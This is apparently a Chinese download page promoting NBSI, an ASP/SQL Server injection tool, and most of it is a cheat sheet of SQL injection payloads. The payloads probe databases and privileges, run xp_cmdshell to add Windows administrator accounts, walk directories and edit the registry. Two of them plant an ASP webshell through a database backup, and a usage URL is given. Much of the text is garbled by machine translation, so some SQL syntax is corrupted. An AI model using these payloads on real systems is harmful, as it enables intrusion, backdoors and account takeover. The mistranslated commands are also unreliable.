nbsi(asp注入漏洞检测工具)软件介绍（nbsi(asp注入漏洞检测工具)）

nbsi(asp注入漏洞检测工具)能够为站长们提供更安全的漏洞检测功能，旨在保护网站的安全，可以对网站进行扫描和分析，特别是在对sql server注入检测这个方面十分的有用，如果有需要的快来试用吧！

nbsi网站漏洞检测工具介绍

1.判断是否有注入

；并且1=1

；1=2

2.初步判断是否是mssql

；和用户0

3.判断数据库系统

；和（从系统对象中选择count(*))0 MSSQL

；和（从msysobjects中选择计数(*))0访问

4.注入参数是字符

和[查询条件]和' '='

5.搜索时没过滤参数的

和[查询条件]和"%"='

6.猜数据库

；和（从[数据库名])0

7.猜字段

；和（选择计数（字段名)从数据库名)0

8.猜字段中记录长度

；和（选择顶部一透镜（字段名)从数据库名)0

9.(1)猜字段的美国信息交换标准码值（访问)

；和（选择前1名asc(中间(字段名，1,1))从数据库名)0

(2)猜字段的美国信息交换标准码值(mssql)

；和（选择前一个unicode(子字符串（字段名，1,1))从数据库名)0

10.测试权限结构(mssql)

；and 1=(SELECT IS _ SRVROLEMEMBER(' sysadmin '))；-

；and 1=(SELECT IS _ SRVROLEMEMBER(' server admin '))；-

；and 1=(SELECT IS _ SRVROLEMEMBER(' setup admin '))；-

；and 1=(SELECT IS _ SRVROLEMEMBER(' security admin '))；-

；and 1=(SELECT IS _ SRVROLEMEMBER(' disk admin '))；-

；and 1=(SELECT IS _ SRVROLEMEMBER(' bulk admin '))；-

；and 1=(SELECT IS _ MEMBER(' db _ owner '))；-

11.添加mssql和系统的帐户

；exec master.dbo.sp_addlogin用户名；-

；exec master.dbo.sp_password null，

用户名、密码；-

；执行主管。dbo。sp _ addsrvrolemember系统管理员

用户名；-

；' exec master.dbo.xp_cmdshell '网络用户用户名

密码/工作站：*/次数：全部

/密码更改：是/密码请求：是/活动：是/添加'

；-

；' exec master.dbo.xp_cmdshell '网络用户用户名

密码/添加；-

；执行主管。dbo。XP _ cmdshell ' net本地组

管理员用户名/添加；-

12.(1)遍历目录

；创建表目录(paths varchar(100)，id int)

；插入dirs执行主管。dbo。XP _ dirtree ' c:\ '

；和（从目录中选择前一条路径)0

；和（从目录中选择前一条路径，其中路径不

在('上步得到的路径')))

(2)遍历目录

；创建表temp(id nvarchar(255)，num1 nvarchar(255)，num2 nvarchar(255)，num 3 nvarchar(255))；-

；插入临时执行主管。dbo。XP _可用媒体；-获得当前所有驱动器

；插入到临时(id)执行主机。dbo。XP _ subdirs ' c:\ '-获得子目录列表

；插入到临时(id，num 1)执行主机。dbo。XP _ dirtree“c:\”；-获得所有子目录的目录树结构

；插入临时(id)执行主机。dbo。“XP _ cmdshell”类型c:\ web \ index。ASP '-查看文件的内容

13.mssql中的存储过程

xp_regenumvalues注册表根键，子键

；exec XP _ regenumvalues ' HKEY _ LOCAL _ MACHINE '

'软件\ Microsoft \ Windows \当前版本\运行'以多个记录集方式返回所有键值

xp_regread根键，子键，键值名

；exec XP _ regread ' HKEY _ LOCAL _ MACHINE '

'软件\ Microsoft \ Windows \当前版本，

'公共文件目录'返回制定键的值

xp_regwrite根键，子键，值名，值类型，值

值类型有2种注册_SZ表示字符型，注册_双字表示整型

；exec XP _ regwrite ' HKEY _ LOCAL _ MACHINE '

'软件\ Microsoft \ Windows \当前版本，

测试值名称，' reg_sz ''你好'写入注册表

xp_regdeletevalue根键，子键，值名

exec XP _ regdeletevalue ' HKEY _ LOCAL _ MACHINE '

'软件\ Microsoft \ Windows \当前版本，

'测试值名称'删除某个值

XP _ regdeletekey ' HKEY _ LOCAL _ MACHINE '

'软件\ Microsoft \ Windows \当前版本\ Testkey '删除键，包括该键下所有值

14.mssql的支持创建webshell

使用模式

创建表格cmd(字符串图像);

插入cmd(str)值(' % Dim oScript % ')；

将数据库模型备份到磁盘=' c:\ l . ASP '

15.mssql内置函数

；和（选择@ @版本)0获得Windows操作系统操作系统的版本号

；并且user_name()='dbo '判断当前系统的连接用户是不是救世军(拯救Army)性感(性Apple)需经批准有待批准(受制于Approval)半自动的(Semi-Automatic)减震(震惊Attenuation)表面面积(表面积)

；和(选择用户名())0爆当前系统的连接用户

；和(select db_name())0得到当前连接的数据库

16.简洁的webshell

使用模式

创建表格cmd(字符串图像)；

insert into cmd(str)值(' %=server . createobject(' wscript . shell ')。exec('cmd.exe /c '请求(' c '). stdout . read all % ')；

将数据库模型备份到磁盘=' g:\ www test \ l . ASP '

请求时，请像这样使用它：

http://ip/l.asp？c=dir

编辑评测

Nbsi(asp注入漏洞检测工具)非常强大。希望同学们用在正确的方向上，不要做一些丢人的事情。用VB语言编写的网站漏洞检测工具名称和ASP注入漏洞检测工具具有较高的准确率，特别是在SQL Server注入检测方面。喜欢就来试试吧！